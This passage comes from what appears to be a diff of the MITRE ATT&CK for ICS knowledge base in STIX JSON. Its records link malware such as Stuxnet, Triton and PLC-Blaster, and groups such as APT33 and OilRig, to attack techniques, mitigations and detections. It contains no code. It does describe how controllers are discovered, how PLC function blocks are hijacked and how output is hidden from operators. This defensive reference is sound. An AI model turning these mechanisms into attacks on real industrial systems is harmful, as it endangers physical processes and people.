"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:10:58.645Z", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) can collect AutoCad files with drawings. These drawings may contain operational information. 
(Citation: ESET)\n", + "relationship_type": "uses", + "source_ref": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--351e19c4-c16e-493a-9800-a433107aacf1", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:36.935Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) uses a Python script that is capable of detecting Triconex controllers on the network by sending a specific UDP broadcast packet over port 1502. 
(Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7bfaf0ff-6d88-460f-aa32-3fb0267b4f20", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques likeDomain Fronting.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5041e17d-6349-4589-8c61-7b43964b5f9b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Integrity checking of transient assets can include performing the validation of the booted operating system and programs using TPM-based technologies, such as Secure Boot and Trusted Boot. 
(Citation: Emerson Exchange) It can also include verifying filesystem changes, such as programs and configuration files stored on the system, executing processes, libraries, accounts, and open ports. (Citation: National Security Agency February 2016)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "Emerson Exchange", + "description": "Emerson Exchange Increase Security with TPM, Secure Boot, and Trusted Boot Retrieved. 2020/09/25 ", + "url": "https://emersonexchange365.com/products/control-safety-systems/f/plc-pac-systems-industrial-computing-forum/8383/increase-security-with-tpm-secure-boot-and-trusted-boot" + }, + { + "source_name": "National Security Agency February 2016", + "description": "National Security Agency 2016, February Position Zero: Integrity Checking Windows-Based ICS/SCADA Systems Retrieved. 2020/09/25 ", + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/industrial-control-systems/position-zero-integrity-checking-windows-based-ics-scada-systems.cfm" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f29ecf69-1753-44bb-9b80-1025f49cadda", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 
2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:24:02.276Z", + "description": "DP_RECV is the name of a standard function block used by network coprocessors. It is used to receive network frames on the Profibus a standard industrial network bus used for distributed I/O. The original block is copied to FC1869, and then replaced by a malicious block. Each time the function is used to receive a packet, the malicious [Stuxnet](https://attack.mitre.org/software/S0603) block takes control: it will call the original DP_RECV in FC1869 and then perform postprocessing on the packet data. The replaced DP_RECV block (later on referred to as the DP_RECV monitor) is meant to monitor data sent by the frequency converter drives to the 315-2 CPU via CP 342-5 Profibus communication modules. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4631bf49-da0b-4415-a226-112c99ff0f64", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:22:17.841Z", + "description": "Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. 
Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For added context on adversary procedures and background see [Remote Services](https://attack.mitre.org/techniques/T1021) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b5ab26e2-eb90-4f19-b35a-b8a0a5438961", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Hydro", + "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ", + "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/" + }, + { + "source_name": "Kevin Beaumont", + "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ", + "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:57:06.704Z", + "description": "Some of Norsk Hydro's production systems were impacted by a [LockerGoga](https://attack.mitre.org/software/S0372) infection. 
This resulted in a loss of control which forced the company to switch to manual operations. (Citation: Kevin Beaumont) (Citation: Hydro)", + "relationship_type": "uses", + "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58cb4cb5-4b0f-4ce0-b3f9-5deb9de31c52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.145Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fbb7867-79c5-4d45-9876-98c4041dd72e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Consider implementing full disk encryption, especially if engineering workstations are transient assets that are more likely to be lost, stolen, or tampered with. 
(Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f0c81c9f-2fb7-4e7d-98ed-c75e3be7d962", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:21:24.221Z", + "description": "When the peripheral output is written to, sequence C intercepts the output and ensures it is not written to the process image output. The output is the instructions the PLC sends to a device to change its operating behavior. By intercepting the peripheral output, [Stuxnet](https://attack.mitre.org/software/S0603) prevents an operator from noticing unauthorized commands sent to the peripheral. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--99c0c90e-8526-41d6-80ca-b037598c6326", + "created": "2022-09-26T19:37:35.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:36:13.269Z", + "description": "Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--43777394-ff59-4261-b1cf-b41a1f4f4d8b", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:24:52.417Z", + "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + 
"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--09fe4b04-b1d2-492c-9b10-59b94807ccf9", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:46.146Z", + "description": "Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6be3917c-aad7-4a3f-bea2-23e4ba4310ee", + "created": "2022-09-29T14:26:04.715Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:26:04.715Z", + "description": "Monitor network traffic for hardcoded credential use in protocols that allow unencrypted authentication.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2", + 
"created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Andy Greenburg June 2019", + "description": "Andy Greenburg 2019, June 20 Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount Retrieved. 2020/01/03 ", + "url": "https://www.wired.com/story/iran-hackers-us-phishing-tensions/" + }, + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:49.943Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) sent spear phishing emails containing links to HTML application files, which were embedded with malicious code. (Citation: Jacqueline O'Leary et al. September 2017) [APT33](https://attack.mitre.org/groups/G0064) has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies. 
(Citation: Andy Greenburg June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--671043a9-337f-411a-9ca9-3112e897ab09", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e0d101cc-1284-4e88-82d6-227fe5d19d8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:25.119Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). 
Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d2dc57eb-5be2-4f9c-a4f7-18d2085ff412", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian 
Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:31.072Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) communicated with its command and control using HTTP requests. (Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4f98ce1-d0b8-4699-b602-33a6a6ffca67", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:33:51.166Z", + "description": "Monitor for new master devices communicating with outstation assets, which may be visible in asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--990f944f-190d-456d-b194-f5ecb17a0868", + "created": "2019-06-24T17:20:24.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:40:11.392Z", + "description": "A [Conficker](https://attack.mitre.org/software/S0608) infection at a nuclear power plant forced the facility to temporarily shutdown. (Citation: Catalin Cimpanu April 2016)", + "relationship_type": "uses", + "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c85bff0-8f70-479e-9365-fef1e3fe2b95", + "created": "2022-09-27T17:22:27.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:54:23.870Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. 
Scripts should be captured from the file system when possible to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--20f66fab-7a08-4707-ac79-92dac5acd11d", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:13.772Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006)'s code is stored in OB9999. The original code on the target is untouched. The OB is automatically detected by the PLC and executed. 
(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1aa02c37-973e-46bd-ab45-609463e514e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. 
Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b8b1739d-dfa2-44e9-907f-7085e262512f", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:01:52.517Z", + "description": "Monitor login sessions for new or unexpected devices or sessions on wireless networks.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 